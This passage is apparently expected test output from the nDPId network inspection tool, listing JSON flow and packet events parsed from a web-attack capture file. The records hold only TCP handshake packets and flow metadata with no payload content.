port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347970267,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347970267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vvZAAD4GBtqsEAABwKgKMocqAFAxLQXyAAAAAKACchDkKQAAAgQFtAQCCAoBPLsEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":2,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhyoPJF9xMS0F86AScSDmFAAAAgQFtAQCCAoD5ox4ATy7BAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":3,"flow_last_seen":1499347970267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vvdAAD4GBuGsEAABwKgKMocqAFAxLQXzDyRfcoAQAOWFHAAAAQEICgE8uwQD5ox4"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347971560,"flow_last_seen":1499347971560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347971560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1499347971560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XBJAAD4Gab6sEAABwKgKMoc4AFCpCuBVAAAAAKACchCQlwAAAgQFtAQCCAoBPLxHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":2,"flow_last_seen":1499347971560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhzgyg4heqQrgVqAScSBE8wAAAgQFtAQCCAoD5o27ATy8RwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":3,"flow_last_seen":1499347971561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347971561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XBNAAD4GacWsEAABwKgKMoc4AFCpCuBWMoOIX4AQAOXj+gAAAQEICgE8vEcD5o27"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347974113,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347974113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rk1AAD4GF4OsEAABwKgKModSAFAISxCIAAAAAKACchD+jAAAAgQFtAQCCAoBPL7FAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":2,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh1LQi4qtCEsQiaAScSAQEwAAAgQFtAQCCAoD5pA5ATy+xQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":3,"flow_last_seen":1499347974113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rk5AAD4GF4qsEAABwKgKModSAFAISxCJ0IuKroAQAOWvGgAAAQEICgE8vsUD5pA5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347975371,"flow_last_seen":1499347975371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347975371,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1499347975371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l4BAAD4GLlCsEAABwKgKModgAFCggleAAAAAAKACchAeFAAAAgQFtAQCCAoBPMAAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8359,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":2,"flow_last_seen":1499347975371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh2BVDgzaoIJXgaAScSAnsAAAAgQFtAQCCAoD5pF0ATzAAAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":3,"flow_last_seen":1499347975372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347975372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l4FAAD4GLlesEAABwKgKModgAFCggleBVQ4M24AQAOXGtwAAAQEICgE8wAAD5pF0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347976658,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347976658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z4xAAD4GXkSsEAABwKgKModuAFDMdKbNAAAAAKACchChhQAAAgQFtAQCCAoBPMFBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":2,"flow_last_seen":1499347976658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh26qPdKAzHSmzqAScSCPCQAAAgQFtAQCCAoD5pK2ATzBQQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":3,"flow_last_seen":1499347976659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347976659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z41AAD4GXkusEAABwKgKModuAFDMdKbOqj3SgYAQAOUuEAAAAQEICgE8wUID5pK2"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347979251,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347979251,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8naJAAD4GKC6sEAABwKgKMoeIAFCOM15oAAAAAKACchAliQAAAgQFtAQCCAoBPMPKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":2,"flow_last_seen":1499347979251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh4iSkzqsjjNeaaAScSDAAwAAAgQFtAQCCAoD5pU+ATzDygEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":3,"flow_last_seen":1499347979252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347979252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0naNAAD4GKDWsEAABwKgKMoeIAFCOM15pkpM6rYAQAOVfCwAAAQEICgE8w8oD5pU+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347980524,"flow_last_seen":1499347980524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347980524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1499347980524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eP5AAD4GTNKsEAABwKgKMoeWAFDY8732AAAAAKACchB57gAAAgQFtAQCCAoBPMUIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":2,"flow_last_seen":1499347980524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh5YkRgUi2PO996AScSC3AgAAAgQFtAQCCAoD5pZ8ATzFCAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":3,"flow_last_seen":1499347980525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347980525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eP9AAD4GTNmsEAABwKgKMoeWAFDY8733JEYFI4AQAOVWCgAAAQEICgE8xQgD5pZ8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347981782,"flow_last_seen":1499347981782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347981782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1499347981782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XEpAAD4GaYasEAABwKgKMoekAFBFSZoIAAAAAKACchAwPwAAAgQFtAQCCAoBPMZCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":2,"flow_last_seen":1499347981782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh6RlAFMiRUmaCaAScSDdXQAAAgQFtAQCCAoD5pe3ATzGQgEDAwc="} 